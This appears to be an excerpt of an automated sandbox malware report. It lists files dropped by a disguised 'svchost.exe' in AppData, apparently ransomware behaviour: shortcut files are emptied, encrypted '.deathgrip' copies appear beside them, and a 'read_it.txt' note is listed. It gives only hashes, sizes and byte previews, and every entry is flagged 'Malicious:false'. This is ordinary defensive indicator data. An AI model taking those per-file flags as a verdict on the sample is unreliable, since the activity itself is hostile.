                                                          Preview:........E.......P....5..k.t....V.0..[..M..G.S.w.m...E.S{....s|../?9.q..Y..WxHg. O...$D..#...............].e.&.'..W.j..|DB..C..L.t.N...08=.u..-f/5....EG..*2..i..!.rT.]GR.C"....)5<..',.....V.=.e~..'.q.##...d......T.O.=........$..H....2.12..j..s..G{:.......,....['.h....<...z.Q.....B.0....4...C....p.7W9....8k..1.|.2JA.w..V ...e.(..c...........4...(...n.!.x. 2C{|.*...;4...^...2@.9..$..oC.Mb..?.=m.h.RM...$..).3cW61J....U......|.R.%..6....A....Q.p.+.KI.3$.?.a.Kb4.h..i.v...{..;...Il..l"EGW......./....J.x.......D..t4..H...9.....S..;..J...7.m.B.7....c...Bo...[S.,a[..Q...a...zF....._1M ..G/u..#.........._.N.G....J.\d...I.x.a...4.(V.u..t....P.A...8UU4..N.DY."...u8n..=Z.q[Q...a.9.-..7...H.. ._|cd...m[.^ .G....+.C.......,].<.......]@.S.!..*....Q.LBLl.v.`s.x.E..U..$.@g..D.n....Z_...J....m.9.....q........0.......\.>:..>..dh....!...).p.....@.......GY..G....J....(|..t.!.@..D.H.K..bE..D..#..?.^.9..\...5...3..."....O..{.$...*..Z..!=.YZ.u...v+....se.2.....S...

                                                          C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group3\04-1 - NetworkStatus.lnk

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group3\04-1 - NetworkStatus.lnk.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1936
                                                          Entropy (8bit):7.829813206558995
                                                          Encrypted:false
                                                          SSDEEP:48:q6mqDEyqBe0FOPMTmo0sjoIsTw112ao4jtTcN:hpx90sPMTkrImUl9cN
                                                          MD5:1F88EFC743CFEFCB41868287B65B4009
                                                          SHA1:995121497481246696993694E2CDCDD0AD9DD21B
                                                          SHA-256:841564932CFA3D392D8E2ED533FAB20EF403D648938ABA9604CD0A1BB5AEF2E5
                                                          SHA-512:552173C9563BA459993F2A50B1BA41C83B67B22895A232C07DA84873C31E3798E1EE0BA02308AB8182AEA073317368105D3A7BC79D181399EF3245A49AC96F5C
                                                          Malicious:false
                                                          Preview:........E.......P....5....$....}_...9F../..L...cK-..:V..,0j..@.h.....S.K.....Q.<,.C?F.........9FB..y....z5~@.4.['.?.|uu.....I.l..t..Y...nw.T>..<.zK..`7....c.....t.(...x....qBr.=~V.9......p..G..c.ts..5.._.I..oQ3Tl*..|'.+..U....Up..X.~" ..(v...Rg..,L...pd..b.)D...kK.jn...x............|n..zr....$8..,..#?.aA._..o.K.5\..vR+...}d.9....P9..8,._...[.d8.....P.L...GOR....."W..Y..u`.?...."C..)T/|U..nsU.......m....e...C.$f8...qg|\.....Z..AX...I.QR.Z.O.=;OXg.C......!`..x.g.:......P..g...3.;-y.*...1x~,.b.@:l..0....Sv..d..:.ZR.@?:].."q.fp..,.....v.{.Q$e..>?.Z.[2u........G:..l..p..Sc.o.h.]R..o...Q.4.u..`U..symlH.`G.K.y.........}....S.U..Mo..x."....{G.....x*%...`....|.....j..1..`g.3.`..V..m=.ja........-....).F..yUO......IqB..Q_...=...4.VB..2A0.w..4..K......k/{.....S......v.p....E..^...P...#.;3........n...'.....P.v1.F.^e.E..a.FK.f....V.R..,R...C.yG.s...r.81..O.\...i!k..3.Z..v.%....]N......(.Z.....bh..I..Y....L...q.8....2A(O.o...9{1....v.~V..j..V.+...-Zh.a..Y

                                                          C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group3\05 - Device Manager.lnk

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group3\05 - Device Manager.lnk.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1440
                                                          Entropy (8bit):7.752124262818774
                                                          Encrypted:false
                                                          SSDEEP:24:KNe7f4hrC/rCfkhw8sEjjiwZeBERbGj5eivisfnCzs12m0YMYwz+zs8tr3b:KAFrkkhw0fSBEBiVCzm0Ynwz18v
                                                          MD5:D73621A328DD410E828C5E0FE3A13894
                                                          SHA1:60BE8DD59BF090F791A41EF8C19F66E7CF89A6CA
                                                          SHA-256:F7B1EE53416061904A7A3CF022BE3B9DED252A8A81EF4E6AD36471B5D979FD33
                                                          SHA-512:E1885562D13918A6847ADE81EE4C44FC1F16B8D500AEA3F67C5941E9157200428A0BAFD00AC962CF177AB3B936B7A7A554F1DDD4655532846B1B2E9130B88B26
                                                          Malicious:false
                                                          Preview:.........Q.E .....D.~e^^..P..t.......*..5..#.9..T...&o....D.k.5.a9k.K..T..i:.Y....{...|S2.41.(K....A..B.F.......#$..V<..1.^2.C.b.F.H....F.a............:?........T...A.P.......\...VD.... ..G. #cb.._.yP.&...x.L.....i*G..i../H|B`....+..;....8U%Tc..]}.I...C....4J.!!.y..#..f.^.a....+.V...1....'...O.FJP....vCF*.#....L......1...HQk.BQ..d.......V4.......~^.....J.a....h....>%...kwS.=A.9..@U[R..VC...e..J`.`r.5ke0........fj..!J.y.W .I1X~..<..+...3.P..p......v=.3_.T.+.."..:d.^..}.`..wg.j.......&}...i....}.y..@!A...O?.CE.f+.5..j+8.E,....a....8.$.(...4h....W..i....e#...K.I..2..t....P=..,....g...Q......7..1|.%a..'LVC6.}@k.F.*]'.../...;.....Y..Z`..5e.U.....Ip...Kb...DA.NN...K7...f.K.../..4..3v...*-;.2/e.....a.D.d.A.....Q..<K...x,.G.z.b.i.a..q.X.wb..V`.......Z'4a)1[i..D........}....P.'.........YX.%.:......?l>.. .r`p.1..Q..WK.7X..s...........C.y.........e...U.,.<....U.gy.d..I...&...'ewM...>m.+.Q5b....A|.h.~...`.W....h....>6K.$.?.r.....J./

                                                          C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group3\06 - SystemAbout.lnk

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group3\06 - SystemAbout.lnk.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1936
                                                          Entropy (8bit):7.8401600264714135
                                                          Encrypted:false
                                                          SSDEEP:48:nW3L4LuUCVkX2olAPHNT7R1/nwQ5/2gbJ:90SXmd7/wgJ
                                                          MD5:F151FA7972B42E2C586A1E58BD4372CD
                                                          SHA1:E63E7C6436C00C5F70B170843EE4792B42548A1E
                                                          SHA-256:00272EB4D2F4BC278A295B1EAA750459D057700AC167B6B398B2AE23AFC047DA
                                                          SHA-512:DD6645BFBB6CD05F35EBB8BB6B946102A8FB24D5A516B23E0FD79578F21B1AA9E6857540E5E80B0AE7FC6DED23563CF008EA71B838E9A73C7D93A10E8DE186DA
                                                          Malicious:false
                                                          Preview:........{..z_-`.:.Ma..3..?...|a...4.-e..$..#$....q..v..C+........Le.....rU,(....r.h..|1.._.$.%%.....unGW.3........$Q..=.c..M.c{.}C....4...>.i...d..`;....}_. .0....2>.......n....P...:cVCZ.sA++..f.>.f.kf..f....t_...72.I..n....6.....)N=.,..r[....X.g.....`6_...1... .......4.u.m~..]......a.......Z..G..ue....kB.y.+C.UEBP....q_!Um2.V~.F.....c.J.+....@n..Ko..}h.Ie...B...ri..BF(....c..~...S..Q./.m..jZ..0~..,.L...M.J.'a..J.......".G.X.d....$./....4..0bEks...Sj-.N..dhL...E.N.S`+p.k9dk.....4......._.uH..;0........R...]4...9.0w.n..[p..G.!.B... ...xsu./.=...vS...OpC.C.2..Xu........*-sh.Wa...2.U......W':$7...u.o..............n.A.n[pa...#.....{)!g.z.K...R....._..E.:.H.QU......}^U]..f.<.bB.j.. ^o4...v.g@[F.".nQ..}p..C.p..k..a....^w........%....QR...|.W.=1.s./.H..P.6eL....K..B)...Yu.."..v.pt..1...Rr.S....*@#....v.m..s=(8i.R......).j....1Y..r..#T@...........=.C~.M.......SO.>..2,..i.pE.,.Q..'.[M ..J[......>...6rs.1D/O."c=....*6....q...gi.%T.+......h......_

                                                          C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group3\07 - Event Viewer.lnk

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group3\07 - Event Viewer.lnk.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1376
                                                          Entropy (8bit):7.7156097963440065
                                                          Encrypted:false
                                                          SSDEEP:24:qaVpBmxOaeeQWJF3tnCNSxMpMikYSBvV0uIPsYABmlYzs6HkN1iePxEP:TpBIfjf3VCs1HBtV16sYABhJo1iePxEP
                                                          MD5:490BB435A7146EF3A61C6E3C6CB44A55
                                                          SHA1:C1F2738CD1682910B859037B35DF39382458C82E
                                                          SHA-256:3D2967CD85221C5678444CA89C8D23B59F1F16AC590DBB4BBEF9A5DC3C000D41
                                                          SHA-512:14F3DC4FA01F803A7EC77DD1699862AC3E87639641C214BE5D22A22882B05358B1E7D3E4E9091046EEB47DBF0F8C30BA66D970C97CF72A0C8FA7196D8EB0B044
                                                          Malicious:false
                                                          Preview:........J...>.3.]m.9qi.|Qa....#.....V..nS..u..&..(H<.L...mvIMz.].*@\6a?.(!G."..L..\b....Q.$....lz...GV%A#.*.Q..Ei.AK..T......e.....U.~.j.F.]..W....p9.#M.]..K1.U.pI...iz.RG..~Er.....i.l..H.Ddj...N&.}.c3^.[t,...C.S=_........<!.....=...}.X...>.=(.......W|..3g...W.$U.P4n9<T..2....$....JE.)f........>S.....s]..$...}k.,......-..i..h..M_.C...<..cy,..q...H..%.G....w>(.c.y.\R......,6Q..j..u.C.....AbXa..H...JC...K..V$....*c..0'~...cV..1j0..0...6R-. M3..D.......cDv.....Qy.`..qUd{G...J.|c.*{"-&.GD*..LqI$...is.a.$.D..l........U.;ch.).-...f...ns..j.).);..)*...[K.(...qYCC...{.[r.I2........^[S1..&...e..b..uX.............a.'..I.a..z-....;_....~.....qY.r5..j^..."...%Pr....HaP.V.....D..z1...Q .{..E..f.p.2..QdA....:).@I..u.z..B.d..WVn.]fO...F..7.;(.|....(g!.AMS..4""..2id6.Je.[L..z...H..i..q.L...3..v...<...c..u.5........#....{QCP...8.5...o.X.d81..T..G.6y.. .............I..j.....!...,.....Jf..C@.<.......*.rwg.R4...7.........3..]..1.C.iOt.v..M....j.z.{/.

                                                          C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group3\08 - PowerAndSleep.lnk

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group3\08 - PowerAndSleep.lnk.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1936
                                                          Entropy (8bit):7.842420747965826
                                                          Encrypted:false
                                                          SSDEEP:48:2FwbO/iwJKU6BD/tMC2IkDlhsq8ERZIB8:2KS/iX/B7tMek5hpRZIy
                                                          MD5:07B9743A946F579B2E6678AD0444716D
                                                          SHA1:982A9FC87E280014AF8EBC246B950A096B9AC1E2
                                                          SHA-256:BD1DBD3A9F929EC524D15F65F94AEA17F4469EB8050768D555474DEFC2E5218B
                                                          SHA-512:BFA95F8D30AC26422E314C4CCCB28F11D8C90CCA3371807C463B619084D76816CA39566E11AAE2A006BD2B3B7A6D74F3C11ECE9D651324ADCB577F250A413E4D
                                                          Malicious:false
                                                          Preview:...........w.(.......aD...k...).....E..c.......G...J.........<lm.o}!.o.&.W...N.Xd4(F.4e....|.../.okO.V.....Tj.5.<V.T.x...../m...*P.d.Y..v..=.\@FbK/.j.,d..6.#\....m....d..P..U*..Avz.e...+E.#I.P..'...n..X~K.|...d'^..'.z.T[.>.....8*5-Umn.ri.]......k.A(U.:E.t...e~o........1...Gl..|I7.[w ..8r}g.....CA.6U.n...B....f.9(5|s."K.m@.......Y.X......P.f=. y.n3.eo3^QJ_.".^.....\b...E.A8..s...L....z..s...t..u...V..W.V......`In'(..d...2....`...A.[...q.L........:...-mKQ...?...q!}H.u....>.%>...O.w97"WA..0.DeWO..T...+.0......../.[O6..X5$p............S....yQ...1..P%..o...g.)..W..=d.T..V9#.......hj#.......}81..G....11.D..%).d....n.G.vS.ZF.!^...K......@..B.T.3o...e........T<md.....Bl....G.U..#K....C6}..H.......[&....y......%{..u..>...&W....+."e..NQ../y........._7I/.{....*..gv.k.F8.r...X.Js.ej..p[F(......~.)Y~..E..Q.n.*NO..............(.E....l`.d.1f9....!.CC..Z.;....Se.p.0]+^.h.<4..G..R&BQ@....Hg`..SC...o.F.,.Y.&.*[d....h...7...|}.[..B.I......{s...C....8.E..0.]."......

                                                          C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group3\09 - Mobility Center.lnk

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group3\09 - Mobility Center.lnk.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1376
                                                          Entropy (8bit):7.745702753166535
                                                          Encrypted:false
                                                          SSDEEP:24:8VMV2SEjoyh/khUlphnMsblxxgEgwwrtEyet3uB3RY90:X4nhPisbMwwr2yet37W
                                                          MD5:E1139EF4D8BFB1E50B7136E8E63D7D86
                                                          SHA1:4C264E69F7243554DDECCB26D7B14078B76C46AC
                                                          SHA-256:92368FC9EB6F3F1EC95285CD000B7DA4D60186C4D3A9815359D733F0DCB72170
                                                          SHA-512:B80AFA841A716099AA970E546B42D114A539AC640C370923355C88EE9962B1CCE1E82F299DB41AA6AC2D9866048F2A9584048D809A86BDDF6BEC66888723191F
                                                          Malicious:false
                                                          Preview:...............m.e.L.3..Md.n..7.u..dW@.B..-.G.....~..]L...>2}...,.........i.d..I..y....+5;.t..=s...xu..L>-.....k..N....].....??..e...l..U[_..p...lq...4..Qn.Kg.\M.vZ.......ZR].%...R...a......J..pW.....;e.jh....o.....~;....]Yf...^......:.z...^.-k~.~.....|..{..oO-..PR.....'@.B._m.-.=...x.0..W.......|1.ch...D.}...Lx m...d....._.....W..QS...h.2.Q......\..G....#.I..ukE.._.ABB.....Y..j.....1.e..EK..H..$...J..P.N..U.-.M.-Y..E...v.`.x.m....5..3-.0...W......a`.v....9.J.:..d.<nA..........<...-..'.m.E....R....Q.8.......)......D.-h\.k....O.:.....)e.k._=.%Q.....In...u.]..^.{.~..y..~.P.].%.w=s.']<N.^.W.]<..._ov.......K.`.4.[.*.}.b.n.c..w..M]l.%y.O.X..Uh]L.&..I...X.....D.".Q...SZ....(..j.-..}I..DO.=.NC.)..+..=|....[.Q.7..s.~...x2u.b..........X...p..\G.sKOlv,t3.._..)....l...1.Q.:.N.).....r..)..S.......r..j..z5c2....9.C.4}=..Rk.4..]..X..8....$.....O.].+....v....AG..p@.4P4c9|.Xx4..........._W..E;..V.$.8..5W.im.;.`J8.J.F../.?.M:&!....?..c}..&.. r...."...0.d....*.w

                                                          C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group3\10 - AppsAndFeatures.lnk

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group3\10 - AppsAndFeatures.lnk.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1936
                                                          Entropy (8bit):7.840709180158932
                                                          Encrypted:false
                                                          SSDEEP:48:fNB5KvXLqFo5Nm2ziAzh2sdS3NY2MqEl7S2893fmIfk3Gx5KhRBp9sYTS76f:fTM/Lqq5YsCNY2eBkvmIs3UKhdDc6f
                                                          MD5:DCD8830D0CD5D2F9687329E764861586
                                                          SHA1:C1D4FAC0A87C094B381CFC7200F0F9EB51F743D2
                                                          SHA-256:55590D71C407F0B84695774EB49E25A498BADF45DEF42CD1A153A74147A009DC
                                                          SHA-512:EAE257275974D5034B471952BDF6038FF462D9396AE226D0A26011DF338FFC7D3DB27B73920102BD654C4E6D9C1035388E5230DAA92E8794C10A47D658BD059E
                                                          Malicious:false
                                                          Preview:..........}..X.....=..k.u..Q.w.].g......%.?.u...?..y..W....Z.......h.T...d........e....+...U%.......Pg.......F`j.G...K.,.3.C.S....w.v..prxj^...b...~..}..w!.-;d..).j..ono*...8.a.x..hi.k.....x........A....>GF..y.>f..x......^rs...9u..Y.. .......#1..?...5.)...OJ/$ne7..h&.Q.Uh.Vhe+.....T.%w...1.......6.D.`.zZ>..rfq.....B..W..m..5..*>O~..`.S2.~{.~.n.k[...n;...[.a.....rC/|G..........U..t.T.........2...w.;%....._....;.....=b..!...:....N......u......PC..Ga/.]...nQ.G..^......T.t..u.U%...j"..rd).:M|.wz.../..lc`O....`.]g..%e....?r...@Z..$..[I...k....Tcl...s.7..0k.?%.,..C....7..^_.v`.....Rr.g..wP_P.,(Jt...bt*V.Rt..l....Cv..`|.:..y..!..Uv..[.|...S.....1...{B..&......z|. 13..~...r.`.G...?9..Q...^~....-e....W...X..l.......i4...]....j...v.W..[.k.ZLN.....GDyb..x.o.g.|p~#3.......R.k^...h.H.T......B.L..I{.....2..*......QDS...:.*.....XMb.J.Y....X#.}..P..}...<.K.r.Z$..<.5a.!{&.7.Q.y..b<9.1....K...M;...7j....1+x.;.Ez.v).>..C..,..55EB7OL.B].nX.|..MuZ.....4......W.

                                                          C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\Run.lnk

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\Windows PowerShell (x86).lnk

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\Windows PowerShell (x86).lnk.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):8
                                                          Entropy (8bit):3.0
                                                          Encrypted:false
                                                          SSDEEP:3:/:/
                                                          MD5:0EE0646C1C77D8131CC8F4EE65C7673B
                                                          SHA1:DD5783BCF1E9002BC00AD5B83A95ED6E4EBB4AD5
                                                          SHA-256:66840DDA154E8A113C31DD0AD32F7F3A366A80E8136979D8F5A101D3D29D6F72
                                                          SHA-512:1818CC2ACD207880A07AFC360FD0DA87E51CCF17E7C604C4EB16BE5788322724C298E1FCC66EB293926993141EF0863C09EDA383188CF5DF49B910AACAC17EC5
                                                          Malicious:false
                                                          Preview:........

                                                          C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\Windows PowerShell.lnk

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?

                                                          C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\Windows PowerShell.lnk.deathgrip

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):2896
                                                          Entropy (8bit):7.915882827256658
                                                          Encrypted:false
                                                          SSDEEP:48:kpxqTPbxqgvJ9ogS1oLk0hLKIy46/UJBnFoG7u++OCOu+irgs8iPMpoEIdyaZQMR:kpwTP9qgvLodIybMpo2udOygs8GMGMiX
                                                          MD5:F332DAC13BFC224D3D14A9911DB53986
                                                          SHA1:B93A6493AAC23F5FF13481CC173447FE260D4F32
                                                          SHA-256:03A0088D5C728E99E282FE0E7E704EFE3243E551986F684252D1AA6D11E89CAD
                                                          SHA-512:D9582725CC0B5DB05CE27DBABFDA80A1863D579DF582D6E8B3B44536F38E1E43C844833D32DBB93A2E057598609B3A95DD40B1E7D2F8A82E6091B8F41325C020
                                                          Malicious:false
                                                          Preview:........Q.x...m.......M.....1......6....+.4&..R..GEZ).).Bk..F'`...BO.f..j.\..Nn}./:.h..;.`.F&.(.*f...........%..Kd^....+5..P&...?.8....G6..f.....U|..6..g(...FA...F..Y....z?...x.......f>...dJ;.a.....jb..s..r...uRZ.}.N...y....q._.|..gM.........D.Y....t.........t$.].[.1.ME..N..-{...........^....A..........p....#...bE.L9ax$4..oX...:..0.....J]..,J([K,.....#..u.g.S.\...4..|c....G.0.c^?..T......t..0o..@....l.....PV&~.";e.....9.9..r}.b=....Jm.....rJ!.."..u5...k:`...`pz...ME.=...O.o..[.............L=H..De..........z....O.$D.Q...T.i..o...a..=T.H.H.s.i..;.......!..J6..ys.y.[........o....h.B....o..{.~..w.Eq..|...q..E[D...i.l.%...a"nb.....E..E.({.s@a[%.....F>.=.j....h.YY7]...U..k....#}i..G.......tQ..f..{.9.;.#.r$.... .n.t/a...P.:`E....Ki.9.Y^.u...v.v\;_.z....1K.WG.6V{...g..K..o...6....R.x...>.dXb)Z.........u_.."Y>i}.~CC3...._.y....x-P&KZ.../'..T...5.-.......O......x.NU"{.(..m.7'.....s..ll...JF..!.'..^....."..l..&...,....Pj1..O)$rw.m..v..,.D..|C9.

                                                          C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\read_it.txt

                                                          Download File
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
